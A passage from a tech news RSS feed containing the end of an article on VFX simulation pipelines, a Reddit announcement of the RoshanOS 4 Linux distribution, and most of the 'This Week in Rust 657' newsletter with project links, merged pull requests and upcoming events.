<p>Instead of treating storage as infinite, a more sustainable approach is to prioritize what truly matters. High-resolution outputs are retained for final shots, while lighter representations can support iteration history. In many cases, recomputing data is more efficient than storing it indefinitely.</p>



<p>This is a model that other industries have adopted successfully — and one that VFX is gradually moving toward.</p>



<h2 class="wp-block-heading">Hybrid HPC: The new normal</h2>



<p>Most studios today operate in a hybrid model, combining on-premise infrastructure with cloud resources.</p>



<p>The challenge, however, is not where the compute exists — it’s how decisions are made. Choosing where to run a simulation depends on factors like data location, system load and cost efficiency.</p>



<p>One principle that consistently proves effective is simple: Move compute closer to data whenever possible. Transferring large datasets is often far more expensive than relocating compute.</p>



<h2 class="wp-block-heading">A simple way to think about it</h2>



<p>A modern simulation pipeline is less like a factory and more like an airport — constantly managing traffic, prioritizing tasks and adapting to change.</p>



<p>At its core, it follows a simple loop: <strong>Data leads to compute, which produces more data, which informs decisions — and the cycle repeats.</strong></p>



<p>The studios that succeed are the ones that optimize this loop as a whole, rather than focusing on individual steps.</p>



<h2 class="wp-block-heading">What breaks next?</h2>



<p>Looking ahead, the pressure will only increase.</p>



<p>As real-time expectations grow through virtual production, and AI-generated environments increase the demand for simulations, pipelines will be pushed further. Storage costs will become more significant, and energy consumption will no longer be ignored.</p>



<p>The next bottleneck may not be obvious — but it will arrive.</p>



<p>Looking back, the challenges we faced 25 years ago seem simple compared to today. But the goal remains unchanged — to create believable worlds that captivate audiences.</p>



<p>Simulation has grown from a tool into an ecosystem — of compute, data and decisions.</p>



<p>We may never fully tame the complexity — but we can learn to guide it.</p>



<p>Because in modern VFX, the challenge is no longer creating complexity — <strong>it’s choosing when not to.</strong></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RoshanOS 4 – Improved MX Linux + KDE Build Aimed at Beginners Switching from Windows]]></title>
<description><![CDATA[Hi r/linux, Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason. Honest context on earlier versions: RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool.  RoshanOS 4 (rel...]]></description>
<link>https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</guid>
<pubDate>Thu, 25 Jun 2026 05:09:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason.</p> <p>Honest context on earlier versions:<br> RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool. </p> <p>RoshanOS 4 (released May 2026) is a full rebuild:</p> <ul> <li>Base: Current MX Linux (Debian Stable) with its solid tooling and long-term support</li> <li>Desktop: KDE Plasma</li> <li>Build process: Using MX Snapshot (MX Tools) </li> <li>Size: ~5.6 GB ISO</li> </ul> <h1>Notable changes &amp; features:</h1> <ul> <li>Much improved hardware portability thanks to proper remastering</li> <li>Pre-configured programming tryouts (Python, C/C++, Java, etc.)</li> <li>Screen edge gestures and other KDE workflow tweaks</li> <li>Pro edition with additional support layers for Windows and Android apps</li> <li>Comprehensive included documentation</li> </ul> <p>This is not positioned as a replacement for mainstream or minimalist distros. It’s my attempt at a polished, productive daily driver with a curated selection of packages on a reliable base.</p> <p>I’m posting mainly to get technical feedback from experienced users. If you try the live session, I’d appreciate notes on stability, hardware behavior, packaging choices, or anything that stands out (good or bad).</p> <p>Links:</p> <ul> <li>DistroWatch: <a href="https://distrowatch.com/roshanos">https://distrowatch.com/roshanos</a></li> </ul> <p>Thanks for any time you spend looking at it.</p> <p>(asakpke – RoshanTech)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/asakpke"> /u/asakpke </a> <br> <span><a href="https://i.redd.it/tyuzuwd0dc9h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uexta1/roshanos_4_improved_mx_linux_kde_build_aimed_at/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 657]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3623222/tools/this-week-in-rust-this-week-in-rust-657/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623222/tools/this-week-in-rust-this-week-in-rust-657/</guid>
<pubDate>Thu, 25 Jun 2026 04:09:06 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#foundation">Foundation</a></h5>
<ul>
<li><a href="https://rustfoundation.org/media/rust-foundation-welcomes-openai-as-platinum-member-announces-donation-to-rust-project/">Rust Foundation Welcomes OpenAI As Platinum Member</a></li>
<li><a href="https://rustfoundation.org/media/rust-commercial-network-launches-to-bring-commercial-users-of-rust-language-together/">Rust Commercial Network Launches to Unite Commercial Users of Rust</a></li>
<li><a href="https://rustfoundation.org/media/mainmatter-is-bringing-hands-on-rust-training-to-upskilling-week-in-barcelona/">Mainmatter Is Bringing Hands-On Rust Training</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-74">The Embedded Rustacean Issue #74</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://bevy.org/news/bevy-0-19">Bevy 0.19</a></li>
<li><a href="https://blog.image-rs.org/2026/06/18/png-adoption.html">Rust PNG crate gets even faster, used by GNOME and Chromium</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.7.0">kache 0.7.0: caching real-world C/C++ trees</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/06/23/new-feature-in-guardiandb-introducing-the-odm-object-document-mapper-layer/">New Feature in GuardianDB: Introducing the ODM (Object Document Mapper) Layer</a></li>
<li><a href="https://shnatsel.medium.com/safe-simd-in-rust-even-on-the-inside-c6f1ff381828">Safe SIMD in Rust, even on the inside</a></li>
<li><a href="https://ratatui.rs/highlights/v0302/">Ratatui 0.30.2 is released - a Rust library for cooking up terminal user interfaces</a></li>
<li><a href="https://dev.to/alexandr_litvinov/adding-a-post-quantum-hybrid-handshake-to-a-rust-vpn-pk8">Adding a post-quantum hybrid handshake to a Rust VPN</a></li>
<li><a href="https://tensor4all.org/blog/introducing-tenferro-rs/">From Julia to Rust: a differentiable tensor stack for scientific computing in the agentic AI era</a></li>
<li><a href="https://hotpath.rs/blog/profiling-async-rust">hotpath-rs 0.18: Profiling Async and Concurrent Rust - Channels and Lock Contention</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://blog.cloudflare.com/hyper-bug/">How we found a bug in the hyper HTTP library</a></li>
<li><a href="https://corrode.dev/podcast/s06e06-clickhouse/">ClickHouse with Alexey Milovidov and Austin Bonander</a></li>
<li><a href="https://kerkour.com/iroh-v1-p2p">Deep dive into iroh: A replacement for WireGuard or a peer-to-peer layer for your application?</a></li>
<li><a href="https://kobzol.github.io/rust/2026/06/21/optimizing-sqlx-test-rebuild-time.html">Optimizing #[sqlx::test] rebuild time</a></li>
<li><a href="https://bitfieldconsulting.com/posts/rewrite-in-rust">Rewriting the world in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://docs.litellm.ai/blog/litellm-rust-launch">Migrating LiteLLM to Rust - Building the Fastest and Litest AI Gateway</a></li>
<li><a href="https://medium.com/@shnatsel/safe-simd-in-rust-even-on-the-inside-c6f1ff381828">Safe SIMD in Rust, even on the inside</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-rust-async-await-by-building-an-http-server/">Learn Rust Async/Await, Tokio, and TCP Networking by Building an HTTP/1.1 Server</a></li>
<li><a href="https://blog.sheerluck.dev/posts/build-breakout-in-bevy-step-by-step/">Building Breakout in Bevy: Step by Step</a></li>
<li><a href="https://medium.com/@vbasky/porting-200-000-lines-of-c-to-rust-building-a-byte-identical-mediainfo-replacement-8e9b587d469a">Porting 300,000 Lines of C++ and Perl to Rust: A Dual-Oracle Media Metadata Engine</a></li>
<li><a href="https://corentin-core.github.io/posts/ruxe-type-level-disjointness/">A data race that doesn't compile</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=RKojTb9IVJc">RustCurious lesson 9: Traits are Interfaces</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=X8GDc2AtbG8">BAML: a new programming language (created in Rust)</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=O3YWQvNqwHc">The Future of Version Control</a></li>
<li>[Video] <a href="https://www.youtube.com/watch?v=1Xz1E_27Uqc">Borrowing Beauty: My Beginner's Quest to Create Approachable Bevy &amp; Rust Code</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/orium/cargo-rdme">cargo-rdme</a>, a </p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1616">Diogo Sousa</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>




<ul>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/116">AimDB - Non-blocking fallible <code>try_produce</code> for bounded / non-overwriting buffers</a></li>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/99">AimDB - Add minimal example: hello-mailbox-async</a></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>515 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-16..2026-06-23">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157926">implement <code>#[diagnostic::on_unknown]</code> for modules</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158042">outline part of <code>evaluate_goal_raw</code> into its own <code>#[cold]</code> function</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157967">preserve <code>track_caller</code> for by-value dyn vtable shims</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156983">add <code>io::Read::read_le</code> and <code>io::Read::read_be</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155616">constify <code>TryFrom&lt;Vec&gt;</code> for array</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157878"><code>impl [const] Default for BTreeMap</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157912">stabilize <code>str_from_utf16_endian</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158012">stabilize <code>strip_circumfix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/141266">stabilize <code>substr_range</code> and <code>subslice_range</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17112"><code>diag</code>: Support <code>build.warnings</code> for cargo lints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17117"><code>add</code>: list too-new versions and how to override</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17123"><code>host-config</code>: dont apply target config to host artifacts</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17107"><code>install</code>: Run cargo lints like rustc lints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17118"><code>resolver</code>: hint how to resolve too-new versions</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17127"><code>test</code>: skip dwp uplift test without packed debuginfo</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17110">add Solaris fcntl file locking</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17012"><code>-Zmin-publish-age</code></a> (RFC <a href="https://rust-lang.github.io/rfcs/3923-cargo-min-publish-age.html">#3923</a>)</li>
<li><a href="https://github.com/rust-lang/cargo/pull/17108">improved the test error messages when 'rustc -V' fails</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17115">remove windows-sys dependencies older than 0.61</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16931">add lint to suggest <code>as_chunks</code> over <code>chunks_exact</code> with constant</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16252">new <code>unnecessary_unwrap_unchecked</code>: lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15907"><code>extra_unused_type_parameters</code>: don't suggest an autofix</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17001"><code>let_underscore_future</code>: skip bindings with an explicit type annotation</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16976">avoid ICE when evaluating constants containing unsized type args</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16928">avoid <code>map_unwrap_or</code> fix when default is adjusted</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17256">do not check for unused lifetimes in expanded code</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17249">don't trigger <code>unnecessary_box_returns</code> when the size depends on generics</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17243">find a shared context for the format string and the <code>format!</code> call</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17205">fix OOM panic for large types on uninit check</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16964">fix <code>std_instead_of_core</code>: false positives for <code>core::io</code>/MSRV</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16926"><code>manual_slice_fill</code> detect for in loops over <code>&amp;mut [T; N]</code> slices</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17239">merge comment and cfg checking in <code>matches</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17266">perf: check the method name first in <code>or_fun_call</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17265">perf: compare method names before type queries in three lint passes</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17275">perf: run structural checks before const context queries in <code>question_mark, manual_clamp</code> and ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17272">perf: skip <code>match_same_arms</code> work when the lint is allowed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17226">perf: skip tokenizing in <code>span_contains_cfg</code> when no '#' is present</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17278">treat <code>!</code> the same as <code>-</code> in <code>unnecessary_cast</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22618"><code>assists/replace_match_with_if_let</code>: don't parenthesize if-let guards</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22617"><code>implements_trait_unique_with_infcx</code>: only forbid the self type from being an error type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22516">bye bye ted</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22627">do not visit nodes in GC multiple times</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22594">MIR eval mixed bit and byte sizes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22599">check for <code>#[cfg]s</code> in tail expression macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22601">crash on static constants in array length positions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22486">don't complete <code>.await</code> on receivers of unknown type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22621">don't panic on out-of-range integer literals in const positions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22351">migrate merge imports to editor</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week had a lot of big swings, with two significant perf regressions that are accepted
because they unlock future features and perf improvements.
We also saw large improvements in the next trait solver due to the performance optimization work happening there.</p>
<p>Triage done by <strong>@JonathanBrouwer</strong> with help from <strong>@Kobzol</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=b5d46ecb51c3e4134b82570cfe718f093daa6390&amp;end=8b6558a02b2774acfb25cf15e199467c37ba7490&amp;absolute=false&amp;stat=instructions%3Au">b5d46ecb..8b6558a0</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.9%</td>
<td>[0.2%, 2.7%]</td>
<td>184</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>1.0%</td>
<td>[0.1%, 4.2%]</td>
<td>160</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-0.3%</td>
<td>[-0.3%, -0.2%]</td>
<td>2</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-11.8%</td>
<td>[-69.9%, -0.2%]</td>
<td>25</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>0.8%</td>
<td>[-0.3%, 2.7%]</td>
<td>186</td>
</tr>
</tbody>
</table>
<p>5 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups
30 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/660052c17ccde865dff7c7ffd525affa0550c846/triage/2026/2026-06-21.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157497">rustc_lint: Allow scoped <code>non_ascii_idents</code> lint levels</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">Stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">Implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/129436">Tracking Issue for <code>string_from_utf8_lossy_owned</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156508">Infer all anonymous lifetimes in assoc consts as <code>'static</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157820">consider subtyping when checking if an infer var is sized</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156749">remove <code>box_patterns</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153563">Lint against iterator functions that panic when <code>N</code> is zero</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/issues/298">Start a t-project-structure/t-comprehensibility</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><em>No New or Updated RFCs were created this week.</em></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-06-24 - 2026-07-22 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-06-25 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/rust-girona?e=evt-rgneLvX1H85AmjV"><strong>Rust Girona Weekly Session</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
